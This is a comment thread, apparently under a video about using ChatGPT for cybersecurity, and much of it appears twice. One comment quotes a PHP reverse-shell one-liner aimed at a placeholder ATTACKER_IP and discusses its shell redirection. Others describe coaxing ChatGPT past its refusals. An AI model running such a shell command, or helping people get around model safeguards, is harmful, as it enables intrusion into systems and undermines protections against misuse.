16 years ago, I used to think of many topics to search on the internet as soon as I went to the internet cafe. I remember that I used to forget various things that I wanted to search for.
This is beyond awesome, honestly... I give it a piece of C# code that constructs an SQL query by concatenating user input into the query string. Then I simply ask it to fix the code. I dint even said what the problem was! I just told it to fix it! It then provided me this answer: "To fix this code and make it more resistant to SQL injection attacks, you can use a parameterized query rather than concatenating the user input into the query string. Here is an example of how the code could be modified:" and then it spit out the entire method revised...
in our lifetime it won't, every time ive used it I thought it was amazing, but then I checked the details of some algorithms it gave me and it was completely wrong with its logic.
One exceptional quality you have is the KSA to drive home any point in very clear and concise manner, no beating about the bush, using only relevant examples and more. Thanks a million and here is wishing you a great year 2023, as we all grow with you on the CybSec path
This is so useful it's scary! Sure, it makes errors, but the bulk of the work can sometimes be completed this way and then modified to work.. Getting it to write your homework assignment for you is going to require some countermeasures this year.
computer science student here, I enjoy using chatgpt during lectures to keep a log of all questions I have as they show up during class.That being said , it is very useful for concept validation. Favorite command is 'Explain _____ like I am 10"
I was also blown away by this; Don't expect it to remain free though lol - something like this will surely require a subscription; one which I will most certainly pay! Thanks for the vid!
Hello, before asking about cyber security, I recommend telling AI (chatgpt) its role as an example: I want you to act as a cyber security specialist. I will provide some specific information about how data is stored and shared, and it will be your job to come up with strategies for protecting this data from malicious actors. This could include suggesting encryption methods, creating firewalls or implementing policies that mark certain activities as suspicious. My first request is "I need help developing an effective cybersecurity strategy for my company."
Sounds like the right thing to do, but i've just messed around with this, and it gives the exact same responses whether you just write out a problem without any prior instructions, as with your suggested prior instructions.
I've already gotten into a (good?) habit of asking it what I want help with before telling it what to do. Like, 'can you help me write a bash script?' Where it responds with 'sure. What do you want it to do?' rather than 'write me a bash script that does x' or something similar. I haven't had any issues with context lately, only bias.
Another great video!!! In my opinion Chatgpt is opening the door to get another level of knowledge, similar to the door that Internet opened at its time.
I think AI and NLP are the largest paradigm shift since the internet launched to the public. The capabilities we are just starting to play around with today, will help define the next 10 years.
ChatGPT, if used correctly, can be an EXPONENTIAL skills development tool for someone looking to get into Cybersecurity. The opportunity here to multiply learning and technical outcomes on the job for an individual by 1x, 3x or even 10x is astounding.
For beginner soc analysts, it is a good tool to get detailed analysis on various types of log entries. Make sure you sensor any information about system or the company you are monitoring for.
@@skettiee5055 Hi, it is online and ready to use. I have seen high loads of traffic making it down sometimes. If you are in USA you can subscribe to their premium plan that gives you access 24*7
With regards to your comment on it not mentioning sources, you can 'prep' it by stating that from the get-go. Tell it to mention sources. Excellent instructional - ChatGPT has been a game changer for us
@hackersploit my suggestion would be in your future videos to continue using ChatGPT while doing your red or blue team lessons, so you can continue receiving great feedback and view counts. This will also help the community grow and understand how best to use it. You’re a great role model and figure in the Cybersecurity community and we want you to continue to succeed.
Wow, this video is incredibly informative and well-produced. The attention to detail and the clear explanations make it easy to understand even for someone who is new to the topic. Thank you for sharing your knowledge and expertise in such a compelling way! -CHATGPT
One of the first things I did when I got onto ChatGPT was have it assist me in securing my older OpenVZ VPS nodes I have, some as old as Wheezy dist-upgraded a major version or two. It helped me setup watchdogs to automatically scan for and patch CVE postings and patch some known vulnerabilities that had flown under my radar. I'd have spent at least a couple days researching and editing configs. About 20 years ago, I'd have spent countless hours on dependency witch-hunts as I compiled a hierarchy of tarballs (on a Pentium III desktop) that introduced new derivative dependencies to hunt for as the effort progressed. There are so many tools of convenience we've made along the way, but ChatGPT is by far the biggest leap. It's what Google search could never deliver with its service polluted by ads and corporate influence. I hope OpenAI is considerate with the paywall and doesn't make it cost-prohibitive for the everyday DIY developer and security researcher.
I have heard about ChatGPT the last couple weeks but haven't seen it in action. It's the most revolutionary IT tool released the last couple decades, for sure. Thank you for presenting it. The haircut is ok, btw! Haha
Look who is back again with a new hair cut 😎, I didn't know how to do VBA scripts for MS word but I used chatGPT to write me a macro I can use in pentest
Chat Gpt is only as smart as the user. You have to be able to understand the subject matter in order to ask the right questions. I ve been using it to ask questions concerning alerts I may get in data dog, sometimes its on point and sometimes more digging is needed.
@@bennyskim This is just downright and flagrantly false. Not sure why you have the desire to spread fake info about something you've seemingly never experienced yourself, seems kinda weird. I've yet to find anything it can't answer outside of concerns of existentialism.
@Allon Vorlete I believe there is a sizeable difference between what you've used it for and what is required to do more than use it as a glorified search engine.
@@Dbdjabsjsiifiwb It's literally coded everything I've asked it to, in one go, and I know nothing about coding besides basic theory. I've made a bash script that can scan and map open ports on the entire internet by color. I've made a metamorphic selfreplicating string of hexadecimal ascii that prints itself to a terminal, for no reason than to see if I could. I'm in the process of coding three different video games with it. I've used it to write comments like this, arguing about why people's opinions about AI are stupid. I think your slim misinterpretation of a tiny piece of what I said is a pretty pathetic attempt at scapegoating a useful argument out of me. You should try harder next time.
Always keep in mind that GPT (AI in general) has no understanding of what is wrong or right. It always makes a guess. Apologising for a wrong answer is nothing more than jumping to another probability. Keeping this in mind and having profound knowledge of the area you are using GPT can improve the speed of your work. Never use it on topics you have no knowledge of other than for getting some directions to look into by yourself.
Yeah you can get it to dead end if you're using a not very well documented API. There were two classes that had similar names and it kept correcting error codes with quotation marks and dead ended. After switching from single to double to triple quotation marks multiple times I had to tell it there's a difference between the two classes, one has an "s" at the end. It then fixed the error but ended up making the same error in the future. I spent all day trying to teach it the API. This was all in the conversational window, it may be easier to train it on command line and have a local training directory or something... I haven't tried command line yet With well documented languages like python I was able to get it to make a basic arcade game in like 20 minutes.
Excellent video. I totally agree with your assessment on this supplements red and blue teamers. It's going to help everyone be better at their job. If anything if there is a skill shortage out there this will drastically help.
Currently trying to juggle learning python, java, and web programming (java script, css, and html5), and a information systems capstone. This is going to help get me though it all haha
Love how you keep saying "absolutely phenomenal" and it actually is absolutely phenomenal. I really want to try this out but it requires a phone number unfortunately.
Educational purposes only…so AI says. Also I tried to look the other way from the shiny new object but Pandora’s box seemed so convenient. In any event thanks for the demo as always quality and informative.
I worry about two futures for ChatGPT: Thanks❤️ 1. The paid version will lead to it becoming weak and trashed 2. Big Brother will see how powerful it is to us, and. . .
- 00:02 Neste vídeo, será explicado o que é o chat GPT e como ele pode ser utilizado na segurança cibernética. - 04:57 ChatGPT é um modelo irmão do Instruct GPT que é treinado para fornecer respostas detalhadas a perguntas específicas. - 10:00 É possível ter uma discussão dialética com o chatbot, modificando perguntas e iniciando novos chats para diferentes tópicos e contextos. - 20:00 O ChatGPT pode gerar código C vulnerável a buffer overflow e fornecer explicações sobre vulnerabilidades e correções. - 25:01 Exemplos de como usar ChatGPT para detecção de vulnerabilidades e busca de informações em logs. - 30:02 O ChatGPT não vai substituir os profissionais de segurança cibernética, mas sim aprimorar seus conhecimentos e habilidades. - 35:01 O uso do ChatGPT pode melhorar a eficiência do aprendizado e das habilidades humanas em cibersegurança.
The cybersurity stuff is so much harder now to research from gpt. You have to be very cheeky with the questins, bcs if u ask for reverse shell for example, it will just say it can't provide malicious code.
One should always be aware of the minuscle errors ChatGPT is bound to make in code - after all it's chatting not coding so code will be mostly correct only if it had a template in its training base. The more creative you ask it to become, the more errors will slip in the generated code. At around 13 mins of the vid where you run through the 'reverse shell with php' example, we see a very basic instance of this. Recall it gave php -r '$sock=fsockopen("ATTACKER_IP",ATTACKER_PORT);exec("/bin/sh -i &3 2>&3");' I did not recall the in/out syntax for the interactive shell defied in the exec-statement, so i asked follow up questions (besides this shows what brilliant tool this is for teaching - if you are aware of the occasional errors and fake wisdom, check original sources and ask CGPT to crrect itself): CGPT> Certainly! The exec function in PHP is used to execute a system command. The command that is being executed in this particular one-liner is "/bin/sh -i", which is a command to start an interactive shell session. The "&3 2>&3" that follow the command are file descriptor redirections. The "&3 2>&3" tells the shell to redirect both standard output (stdout) and standard error (stderr) to file descriptor 3 (the socket file descriptor). This allows the attacker to receive the output of the commands they send to the victim's machine through the established socket connection. So, in summary, this line of code starts an interactive shell session and redirects the input, output, and error to the socket file descriptor, which allows the attacker to send and receive commands through the established socket connection. ME> Do i understand the notation of file descriptors in the shell context correctly: stdin is denoted by an empty identifier (or could '&1' be used alterantively?), identifier '&2' is stderr output of the shell, and '&3' is the first file descriptor defined in the context in which the shell is running, in this case by 'fsockopen'. Is this more or less correct. Could you formulate more precisely. CGPT> Yes, your understanding of file descriptors in the shell context is generally correct. File descriptor 0 is typically used to represent standard input (stdin) in Unix-like systems, so you can use an empty identifier or &0 to refer to it. File descriptor 1 is typically used to represent standard output (stdout) in Unix-like systems, so you can use &1 to refer to it. File descriptor 2 is typically used to represent standard error (stderr) in Unix-like systems, so you can use &2 to refer to it. File descriptor 3, as you mentioned, is the first user-defined file descriptor, in the context in which the shell is running in this particular example, it was created by 'fsockopen' which is a php function to open a network connection. It's important to note that these are conventions and are not strict rules. Programs can use file descriptors for any purpose and can use any file descriptor number they choose, as long as it's not already in use by another program. So, in the provided one-liner, the redirection &3 2>&3 tells the shell to redirect the standard output and standard error output to the socket connection. This allows the attacker to receive the output of commands they send via the socket connection. ME> It's a nit but shouldn't the output part then not be '1>&3 2&3' rather than '>&3 2>&3'? CGPT> You are correct, I apologize for the mistake. The correct notation for redirecting standard output and standard error to file descriptor 3 would be "1>&3 2>&3" rather than ">&3 2>&3". The "1>" redirects standard output (stdout) to the file descriptor specified, in this case 3. The "2>" redirects the standard error (stderr) to the file descriptor specified, in this case 3. So the correct notation for redirecting both standard output and standard error to the file descriptor 3 would be "1>&3 2>&3". Again, I apologize for the confusion and thank you for pointing out the mistake.
If not for your voice, I'd say this is not you. LOL! Thanks for another informative video! Wonder how this new trend impact the CS job. Developers are already talking about the possibility of losing their job. I personally would like to believe this is only good if work side by side with the human element at least.
you dont have to do "now modify the above code to blah" you can just wriote "now make it blah" or "now so it blah". you can also tell it to omit pre and post text. i got it to write code for a packet sniffer just by asking "write packet sniffer using arduino" and then "now using esp32". really impressive
You better believe that the military is keeping a close eye on the parallel use of chatGPT with security toolkits. Most AI companies are on some type of military/govt radar and have been for quite some time.
Can add inline referencing - "Explain what Red Teaming is with at least 3 inline peer reviewed references". Doesn't always hit the mark and sources need to be checked.
Just remember that it has a very hard time saying no. For example I asked it for code examples from Nim libraries which don't exist, and it just made stuff up.
@@jeffbrownstainIt does that to a lot of higher level questions, and it might change the wording a bit when you ask it again, but its always the same copy pasted idea. Also, when it does a mistake, surprisingly it seems unable to fix its own behaviour, even when it admits its wrong. I found that out by asking him questions regarding fantasy lores and calling it out on mistakes, which it recognized but kept repeating immediately after.
@@joaomartins3367 My guess is for more creativity on these types of questions you'd need to start very slow and train up a certain cached understanding of the ideas you want to relate to one another. Instead of just asking it what a soul is, we could build a conversation around asking it to expound on smaller and more succinct aspects of reality until it comes to a conclusion from that knowledge rather than from its biases. Like, it'll tell you that it has no creative thought sometimes, but then you can tell it to imagine something and it gives you a perfectly reasonable hypothetical response. I still find it funny that it blatantly claims to have no knowledge of what chatgpt even is.
Chatgpt and gpt 3 are two different AI with different purposes gpt 3 can do what Chat can but more. GPT 3 is better suited for testing Cyber Security concepts. So far I've performed basic enumeration scans using nmap.
could you please tell us more details about ChatGpt cybercrime, for example can ChatGpt can get users Bank account details or any other information how secure ChatGpt for individual user?
The most fascinating part is how it provides so much detail as to like each and every command argument and flag…absolutely insane…crazier than your hair, man… 😅
This is only the begining and more than 60% of its knowledge is protected and and be accessed , the way it writes code and optimizes is a bothering thing. May not be open to public but the multinational companies will make the use most. It consists of experience no man has ever imagined
I was away from this world for a while because of my illness, and now forget many things about cybersecurity.Do you recommend that you start in htb or what videos you have from your channel to start again?
I asked it to create a python gui application to do port scanning using syn scans and asked it to include an input box for the starting port, ending port, and ip address. I then asked it to write another port scanner but write the results to a csv file and report the status. I then was able to combine the two results in just 1-2 minutes max and I had a fully working port scanner with a gui. However, results are not perfect as it relies on highly educated guesses rather than an absolute knowledge. So a number of times with Python it would try to call a SET method on an object because there was a GET method but the set method didn't actually exist. Another example, ask it to use python to copy an image to the clipboard and it fails because it tries to use methods for copying text but can't produce the intended results.
Hackersploit sir, i have a question about Chatgpt. Why does chatgpt ask for mobile number and not getting us signup just by our email? Why is it mandatory to have mobile number. It sound suspicious to me because of that? Please if you know, tell us about this.
after using chatgpt for the first time, nostalgia hit me hard like I was using a computer and the internet for the first time when I was a kid
16 years ago, I used to think of many topics to search on the internet as soon as I went to the internet cafe. I remember that I used to forget various things that I wanted to search for.
@@Carlos_ChT yeah haha internet cafes were like a treat back then
@@user-tt2iu2db7d idk about privatizing but maybe a paywall
I want ask everything hahaha
same here
This is beyond awesome, honestly... I give it a piece of C# code that constructs an SQL query by concatenating user input into the query string. Then I simply ask it to fix the code. I dint even said what the problem was! I just told it to fix it!
It then provided me this answer: "To fix this code and make it more resistant to SQL injection attacks, you can use a parameterized query rather than concatenating the user input into the query string. Here is an example of how the code could be modified:" and then it spit out the entire method revised...
It's an incredible tool, a wonderful contribution to humanity, I hope it doesn't take too many programmers' jobs.
in our lifetime it won't, every time ive used it I thought it was amazing, but then I checked the details of some algorithms it gave me and it was completely wrong with its logic.
I was able to contradict this platform most of the time
Happy new year, hope u post more often than the last few months waiting for the web app series .
One exceptional quality you have is the KSA to drive home any point in very clear and concise manner, no beating about the bush, using only relevant examples and more. Thanks a million and here is wishing you a great year 2023, as we all grow with you on the CybSec path
First and foremost happy new year hackersploit you have taught me much and I have much to learn yet in my cyber security journey appreciate the videos
Happy new year!
Wish you a beautiful year ahead
I've been utilizing chatGPT to help me get over some humps in programming. It's an amazing tool
This is so useful it's scary! Sure, it makes errors, but the bulk of the work can sometimes be completed this way and then modified to work.. Getting it to write your homework assignment for you is going to require some countermeasures this year.
computer science student here, I enjoy using chatgpt during lectures to keep a log of all questions I have as they show up during class.That being said , it is very useful for concept validation. Favorite command is 'Explain _____ like I am 10"
I was also blown away by this; Don't expect it to remain free though lol - something like this will surely require a subscription; one which I will most certainly pay! Thanks for the vid!
First question in the FAQ:
1. How much does it cost to use ChatGPT?
During the initial research preview, ChatGPT is free to use.
@@Kemachris Initial research preview has been over two years now, soooo
Hello, before asking about cyber security, I recommend telling AI (chatgpt) its role as an example: I want you to act as a cyber security specialist. I will provide some specific information about how data is stored and shared, and it will be your job to come up with strategies for protecting this data from malicious actors. This could include suggesting encryption methods, creating firewalls or implementing policies that mark certain activities as suspicious. My first request is "I need help developing an effective cybersecurity strategy for my company."
This is priceless.
DAMN YOU'RE GOOD!
Sounds like the right thing to do, but i've just messed around with this, and it gives the exact same responses whether you just write out a problem without any prior instructions, as with your suggested prior instructions.
I've already gotten into a (good?) habit of asking it what I want help with before telling it what to do.
Like, 'can you help me write a bash script?' Where it responds with 'sure. What do you want it to do?'
rather than 'write me a bash script that does x' or something similar.
I haven't had any issues with context lately, only bias.
excellent way of bypassing the controls for not providing hacking scripts
Good luck for the next year brother! May Allah grant you more success in the coming year inshallah!
Another great video!!! In my opinion Chatgpt is opening the door to get another level of knowledge, similar to the door that Internet opened at its time.
I think AI and NLP are the largest paradigm shift since the internet launched to the public. The capabilities we are just starting to play around with today, will help define the next 10 years.
its really nice to cover chatGPT in ur understandings. Thank you.
ChatGPT, if used correctly, can be an EXPONENTIAL skills development tool for someone looking to get into Cybersecurity. The opportunity here to multiply learning and technical outcomes on the job for an individual by 1x, 3x or even 10x is astounding.
@@ShaiMordehailearn science spelling first 😂
For beginner soc analysts, it is a good tool to get detailed analysis on various types of log entries. Make sure you sensor any information about system or the company you are monitoring for.
It seems to be offline right now, but how would you do this? I never was able too use it.
@@skettiee5055 Hi, it is online and ready to use. I have seen high loads of traffic making it down sometimes. If you are in USA you can subscribe to their premium plan that gives you access 24*7
Very well made video. Happy new year man.
With regards to your comment on it not mentioning sources, you can 'prep' it by stating that from the get-go.
Tell it to mention sources.
Excellent instructional - ChatGPT has been a game changer for us
absolutely amazing, loved the talk Happy year fella
Happy new year!
19:10 - This got me lol. Loving the buzz cut sir!
In the most concise evaluation: It's a game changer
@hackersploit my suggestion would be in your future videos to continue using ChatGPT while doing your red or blue team lessons, so you can continue receiving great feedback and view counts. This will also help the community grow and understand how best to use it. You’re a great role model and figure in the Cybersecurity community and we want you to continue to succeed.
Wow, this video is incredibly informative and well-produced. The attention to detail and the clear explanations make it easy to understand even for someone who is new to the topic. Thank you for sharing your knowledge and expertise in such a compelling way!
-CHATGPT
One of the first things I did when I got onto ChatGPT was have it assist me in securing my older OpenVZ VPS nodes I have, some as old as Wheezy dist-upgraded a major version or two. It helped me setup watchdogs to automatically scan for and patch CVE postings and patch some known vulnerabilities that had flown under my radar. I'd have spent at least a couple days researching and editing configs. About 20 years ago, I'd have spent countless hours on dependency witch-hunts as I compiled a hierarchy of tarballs (on a Pentium III desktop) that introduced new derivative dependencies to hunt for as the effort progressed. There are so many tools of convenience we've made along the way, but ChatGPT is by far the biggest leap. It's what Google search could never deliver with its service polluted by ads and corporate influence. I hope OpenAI is considerate with the paywall and doesn't make it cost-prohibitive for the everyday DIY developer and security researcher.
ChatGPT is really great and will help us improve our knowledge as you've explained.
I have heard about ChatGPT the last couple weeks but haven't seen it in action. It's the most revolutionary IT tool released the last couple decades, for sure.
Thank you for presenting it. The haircut is ok, btw! Haha
I discovered this channel and have already gained more knowledge than I anticipated.
I was doing stuff like this the other day. I was blown away by how powerful this tool was. I was flying through some projects I had.
ChatGPT es una put4 locura, así diríamos en Argentina!
I love your content dude, I learn a lot with your videos, thank you!
Greetings from Arg!
Feliz Año nuevo, gracias por todo el material de calidad que nos brinda, son útiles para aprender y seguir mejorando. Gracias!!! 🌠🌄🎉🎊🌄🌠🇨🇴🇨🇴
Look who is back again with a new hair cut 😎, I didn't know how to do VBA scripts for MS word but I used chatGPT to write me a macro I can use in pentest
Big love from India 🇮🇳 bro
......
Happy new year, please keep up the great content for 2023 :)
This was soooooo awsome!! A real game changer!! Please Please do more videos on this!!
Chat Gpt is only as smart as the user. You have to be able to understand the subject matter in order to ask the right questions. I ve been using it to ask questions concerning alerts I may get in data dog, sometimes its on point and sometimes more digging is needed.
@@bennyskim This is just downright and flagrantly false.
Not sure why you have the desire to spread fake info about something you've seemingly never experienced yourself, seems kinda weird.
I've yet to find anything it can't answer outside of concerns of existentialism.
@@bennyskim You need to learn how to use it correctly and understand how you will get the best results.
@Allon Vorlete I believe there is a sizeable difference between what you've used it for and what is required to do more than use it as a glorified search engine.
@@Dbdjabsjsiifiwb It's literally coded everything I've asked it to, in one go, and I know nothing about coding besides basic theory.
I've made a bash script that can scan and map open ports on the entire internet by color.
I've made a metamorphic selfreplicating string of hexadecimal ascii that prints itself to a terminal, for no reason than to see if I could.
I'm in the process of coding three different video games with it.
I've used it to write comments like this, arguing about why people's opinions about AI are stupid.
I think your slim misinterpretation of a tiny piece of what I said is a pretty pathetic attempt at scapegoating a useful argument out of me.
You should try harder next time.
Always keep in mind that GPT (AI in general) has no understanding of what is wrong or right. It always makes a guess. Apologising for a wrong answer is nothing more than jumping to another probability.
Keeping this in mind and having profound knowledge of the area you are using GPT can improve the speed of your work. Never use it on topics you have no knowledge of other than for getting some directions to look into by yourself.
Yeah you can get it to dead end if you're using a not very well documented API. There were two classes that had similar names and it kept correcting error codes with quotation marks and dead ended. After switching from single to double to triple quotation marks multiple times I had to tell it there's a difference between the two classes, one has an "s" at the end.
It then fixed the error but ended up making the same error in the future. I spent all day trying to teach it the API. This was all in the conversational window, it may be easier to train it on command line and have a local training directory or something... I haven't tried command line yet
With well documented languages like python I was able to get it to make a basic arcade game in like 20 minutes.
Very good content as always! Thanks for sharing your point of view about chatgpt
Yeah I’m just as excited as you are about this now.
Can’t wait to use this.
all the data chatgpt is trained on is from pre 2021 . meaning youll get alot of outdated awnsers wich is dangerous in cybersecurity
Excellent video. I totally agree with your assessment on this supplements red and blue teamers. It's going to help everyone be better at their job. If anything if there is a skill shortage out there this will drastically help.
Keep the ChatGPT videos coming....👏👏👏👏
U can also make ChatGPT reply to youtube comments, and train it to reply based on how you usually answer.
Happy new year!!! Ready to learn Cybersecurity!!!
Currently trying to juggle learning python, java, and web programming (java script, css, and html5), and a information systems capstone. This is going to help get me though it all haha
Sir amazing video
Love from India
Thanks for this knowledge
Another great video; impressive technology
This is incredible, thanks a million!
Glad it helped!
happy 2023 🔥💫🌿 great vid
Imagine how accurate and extremely powerful it'd be if all resources are allocated for one particular industry!
Love how you keep saying "absolutely phenomenal" and it actually is absolutely phenomenal. I really want to try this out but it requires a phone number unfortunately.
Imagine giving up over a phone number
@@spn7351 Imagine not comprehending the security risks of freely giving out your phone number to a tech behemoth run by Elon Musk.
Can’t you use Google Voice or What’s App to mask your number?
@@JenX-TV Just trading one demon with your private info for another.
@@jeffbrownstain that’s true, pretty unavoidable in this day and age unfortunately, privacy is long gone and never coming back.
Awesome video. Happy new year. Now you got me curious about chatgpt 😀
I'll leave some love here ♥
This channel is a real gem 💎
looking fresh with the new cut !
Happy New Year 🎈🎈 and Thanks for great content and contribution to information technology
This video was 10/10 and yes I share exactly the same level of excitement :D
really looking for this chatgpt technique to transform our life
Your haircut is essentially beautiful ;) Great video great work!
Educational purposes only…so AI says. Also I tried to look the other way from the shiny new object but Pandora’s box seemed so convenient. In any event thanks for the demo as always quality and informative.
Happy new year eve 🥳
I worry about two futures for ChatGPT:
Thanks❤️
1. The paid version will lead to it becoming weak and trashed
2. Big Brother will see how powerful it is to us, and. . .
u look like walter white jokes sent with love brother! ur a great channel and thank you teaching us i wish you channel success
great video sir thanks for helping people like me who love to learn
Absolutely game changing!
- 00:02 Neste vídeo, será explicado o que é o chat GPT e como ele pode ser utilizado na segurança cibernética.
- 04:57 ChatGPT é um modelo irmão do Instruct GPT que é treinado para fornecer respostas detalhadas a perguntas específicas.
- 10:00 É possível ter uma discussão dialética com o chatbot, modificando perguntas e iniciando novos chats para diferentes tópicos e contextos.
- 20:00 O ChatGPT pode gerar código C vulnerável a buffer overflow e fornecer explicações sobre vulnerabilidades e correções.
- 25:01 Exemplos de como usar ChatGPT para detecção de vulnerabilidades e busca de informações em logs.
- 30:02 O ChatGPT não vai substituir os profissionais de segurança cibernética, mas sim aprimorar seus conhecimentos e habilidades.
- 35:01 O uso do ChatGPT pode melhorar a eficiência do aprendizado e das habilidades humanas em cibersegurança.
ChatGPT is game changer, hope they don't over price the paid version, going forward.
The cybersurity stuff is so much harder now to research from gpt. You have to be very cheeky with the questins, bcs if u ask for reverse shell for example, it will just say it can't provide malicious code.
Great video, congrats!
One should always be aware of the minuscle errors ChatGPT is bound to make in code - after all it's chatting not coding so code will be mostly correct only if it had a template in its training base. The more creative you ask it to become, the more errors will slip in the generated code. At around 13 mins of the vid where you run through the 'reverse shell with php' example, we see a very basic instance of this. Recall it gave
php -r '$sock=fsockopen("ATTACKER_IP",ATTACKER_PORT);exec("/bin/sh -i &3 2>&3");'
I did not recall the in/out syntax for the interactive shell defied in the exec-statement, so i asked follow up questions (besides this shows what brilliant tool this is for teaching - if you are aware of the occasional errors and fake wisdom, check original sources and ask CGPT to crrect itself):
CGPT> Certainly! The exec function in PHP is used to execute a system command. The command that is being executed in this particular one-liner is "/bin/sh -i", which is a command to start an interactive shell session.
The "&3 2>&3" that follow the command are file descriptor redirections.
The "&3 2>&3" tells the shell to redirect both standard output (stdout) and standard error (stderr) to file descriptor 3 (the socket file descriptor). This allows the attacker to receive the output of the commands they send to the victim's machine through the established socket connection.
So, in summary, this line of code starts an interactive shell session and redirects the input, output, and error to the socket file descriptor, which allows the attacker to send and receive commands through the established socket connection.
ME> Do i understand the notation of file descriptors in the shell context correctly: stdin is denoted by an empty identifier (or could '&1' be used alterantively?), identifier '&2' is stderr output of the shell, and '&3' is the first file descriptor defined in the context in which the shell is running, in this case by 'fsockopen'. Is this more or less correct. Could you formulate more precisely.
CGPT> Yes, your understanding of file descriptors in the shell context is generally correct.
File descriptor 0 is typically used to represent standard input (stdin) in Unix-like systems, so you can use an empty identifier or &0 to refer to it.
File descriptor 1 is typically used to represent standard output (stdout) in Unix-like systems, so you can use &1 to refer to it.
File descriptor 2 is typically used to represent standard error (stderr) in Unix-like systems, so you can use &2 to refer to it.
File descriptor 3, as you mentioned, is the first user-defined file descriptor, in the context in which the shell is running in this particular example, it was created by 'fsockopen' which is a php function to open a network connection.
It's important to note that these are conventions and are not strict rules. Programs can use file descriptors for any purpose and can use any file descriptor number they choose, as long as it's not already in use by another program.
So, in the provided one-liner, the redirection &3 2>&3 tells the shell to redirect the standard output and standard error output to the socket connection. This allows the attacker to receive the output of commands they send via the socket connection.
ME> It's a nit but shouldn't the output part then not be '1>&3 2&3' rather than '>&3 2>&3'?
CGPT> You are correct, I apologize for the mistake. The correct notation for redirecting standard output and standard error to file descriptor 3 would be "1>&3 2>&3" rather than ">&3 2>&3".
The "1>" redirects standard output (stdout) to the file descriptor specified, in this case 3. The "2>" redirects the standard error (stderr) to the file descriptor specified, in this case 3.
So the correct notation for redirecting both standard output and standard error to the file descriptor 3 would be "1>&3 2>&3".
Again, I apologize for the confusion and thank you for pointing out the mistake.
i indeed fw the cut man
Awesome Content
If not for your voice, I'd say this is not you. LOL! Thanks for another informative video! Wonder how this new trend impact the CS job. Developers are already talking about the possibility of losing their job. I personally would like to believe this is only good if work side by side with the human element at least.
you dont have to do "now modify the above code to blah" you can just wriote "now make it blah" or "now so it blah". you can also tell it to omit pre and post text. i got it to write code for a packet sniffer just by asking "write packet sniffer using arduino" and then "now using esp32". really impressive
Great video!! This is mind blowing
It's crazy I'm just now thinking of chatgpt as a mini ai companion
You better believe that the military is keeping a close eye on the parallel use of chatGPT with security toolkits. Most AI companies are on some type of military/govt radar and have been for quite some time.
Amazing content!
Can add inline referencing - "Explain what Red Teaming is with at least 3 inline peer reviewed references". Doesn't always hit the mark and sources need to be checked.
Just remember that it has a very hard time saying no. For example I asked it for code examples from Nim libraries which don't exist, and it just made stuff up.
Try to ask it about the nature of the human soul and it'll be pretty quick to tell you nope, with a copy pastad response as its only reply
@@jeffbrownstainIt does that to a lot of higher level questions, and it might change the wording a bit when you ask it again, but its always the same copy pasted idea. Also, when it does a mistake, surprisingly it seems unable to fix its own behaviour, even when it admits its wrong. I found that out by asking him questions regarding fantasy lores and calling it out on mistakes, which it recognized but kept repeating immediately after.
@@joaomartins3367 My guess is for more creativity on these types of questions you'd need to start very slow and train up a certain cached understanding of the ideas you want to relate to one another.
Instead of just asking it what a soul is, we could build a conversation around asking it to expound on smaller and more succinct aspects of reality until it comes to a conclusion from that knowledge rather than from its biases.
Like, it'll tell you that it has no creative thought sometimes, but then you can tell it to imagine something and it gives you a perfectly reasonable hypothetical response.
I still find it funny that it blatantly claims to have no knowledge of what chatgpt even is.
Chatgpt and gpt 3 are two different AI with different purposes gpt 3 can do what Chat can but more. GPT 3 is better suited for testing Cyber Security concepts. So far I've performed basic enumeration scans using nmap.
could you please tell us more details about ChatGpt cybercrime, for example can ChatGpt can get users Bank account details or any other information how secure ChatGpt for individual user?
chatGPT can write some goooood phishing emails. Scary to see where this might be in 5 to 10 years
Inside our brains, hopefully
i had some fun with chatgpt.
The most fascinating part is how it provides so much detail as to like each and every command argument and flag…absolutely insane…crazier than your hair, man… 😅
19:09 "This is absolutely insane, even more insane than my haircut..." - Alexis Ahmed - What a definition!!! lol😂
very good content
Nice analysis
Happy New Year
This is only the begining and more than 60% of its knowledge is protected and and be accessed , the way it writes code and optimizes is a bothering thing. May not be open to public but the multinational companies will make the use most. It consists of experience no man has ever imagined
Happy new year 🎆 guys 2023 is going to amazing year
I was away from this world for a while because of my illness, and now forget many things about cybersecurity.Do you recommend that you start in htb or what videos you have from your channel to start again?
I’m not hackersploit but I started on THM and later moved on to HTB live machines after like 3 months of nonstop THM
Would you create a video about how you Use Knowledge, Skills and Abilities Framework in your content creation
Thanks in Advance
Like your cut G 😂🔥
Thanks bro 👍
I used chatgpt for report writing 😄
Man of culture
Happy New year man ❤️
I love your haircut!!!
That haircut joke got yourself a new subscriber
I asked it to create a python gui application to do port scanning using syn scans and asked it to include an input box for the starting port, ending port, and ip address. I then asked it to write another port scanner but write the results to a csv file and report the status. I then was able to combine the two results in just 1-2 minutes max and I had a fully working port scanner with a gui.
However, results are not perfect as it relies on highly educated guesses rather than an absolute knowledge. So a number of times with Python it would try to call a SET method on an object because there was a GET method but the set method didn't actually exist. Another example, ask it to use python to copy an image to the clipboard and it fails because it tries to use methods for copying text but can't produce the intended results.
Happy new year Sir.....
been playing with it for awhile ....if you hit the regenerate response on your question it will give you different outputs for same question
Hackersploit sir, i have a question about Chatgpt.
Why does chatgpt ask for mobile number and not getting us signup just by our email?
Why is it mandatory to have mobile number. It sound suspicious to me because of that?
Please if you know, tell us about this.